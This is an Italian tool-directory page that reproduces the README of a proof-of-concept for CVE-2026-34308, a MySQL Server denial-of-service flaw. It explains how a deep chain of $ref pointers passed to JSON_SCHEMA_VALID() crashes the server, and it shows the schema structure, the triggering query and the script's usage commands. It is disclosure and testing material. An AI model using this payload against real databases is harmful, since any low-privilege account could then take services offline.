Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-34308 — Proof-of-concept per CVE-2026-34308, una vulnerabilità denial-of-service del componente JSON di MySQL Server. Dimostra l'esaurimento dello stack tramite catene $ref profonde in JSON_SCHEMA_VALID(), causando il crash del server. Include script PoC in Python e analisi tecnica. | Kitploit
Strumenti/GitHubGitHub/joakimbulow/cve-2026-34308
Analisi delle VulnerabilitàExploitPenetration TestingSicurezza dei Database
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Proof-of-concept per CVE-2026-34308, una vulnerabilità denial-of-service del componente JSON di MySQL Server. Dimostra l'esaurimento dello stack tramite catene $ref profonde in JSON_SCHEMA_VALID(), causando il crash del server. Include script PoC in Python e analisi tecnica.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-34308: MySQL Server (componente JSON) denial of service

Bollettino ufficiale del vendor: Oracle Critical Patch Update Advisory — April 2026.

Riepilogo (dalla CVE pubblicata)

Vulnerabilità in Oracle MySQL Server (componente: Server: JSON).

Versioni interessate supportate: 8.0.0–8.0.45, 8.4.0–8.4.8 e 9.0.0–9.6.0.

La vulnerabilità consente a un utente con privilegi bassi di causare il crash del MySQL Server.

Punteggio base CVSS 3.1: 6.5 (solo impatti sulla disponibilità)
Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Analisi tecnica aggiuntiva (non parte del testo della CVE)

Meccanismo osservato: Ricorsione profonda durante la valutazione di JSON_SCHEMA_VALID() da parte di MySQL su uno JSON Schema che contiene una lunga catena lineare di puntatori $ref, senza un limite effettivo di profondità durante la compilazione/validazione dello schema—che porta all'esaurimento dello stack e a un blocco o a un crash ripetibile.

Catena di chiamate (concettuale):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → validazione interna dello schema JSON → risoluzione ripetuta di $ref
  → esaurimento dello stack → blocco / crash

Privilegi richiesti

Per questo PoC, qualsiasi account MySQL autenticato è sufficiente: concedere solo USAGE su *.* (il privilegio minimo di MySQL—capacità di connettersi—senza SELECT, accesso alle tabelle o ruoli amministrativi). Se l'utente può aprire una sessione ed eseguire SELECT JSON_SCHEMA_VALID(...), può attivare la condizione.


Proof of Concept

Script PoC: poc_schema_dos.py

Costruisce uno JSON schema con una catena lineare di $ref (profondità di esempio 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Inviato a MySQL come: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

Nei test contro build vulnerabili, è stato osservato che causa il crash del server entro circa un secondo (i tempi esatti dipendono da hardware, flag di compilazione e profondità dello schema).

Utilizzo

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Per testare un account con privilegi bassi:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Poi: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (vettore ufficiale)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: Accessibile dalla rete
  • AC:L: Complessità dell'attacco bassa
  • PR:L: Privilegi bassi richiesti
  • UI:N: Nessuna interazione dell'utente
  • S:U: Scope invariato
  • C:N / I:N: Nessun impatto su riservatezza o integrità
  • A:H: Impatto elevato sulla disponibilità (blocco / crash ripetibile / DoS)

File

  • poc_schema_dos.py: Script proof-of-concept
  • README.md: Questo file
Scarica lo strumento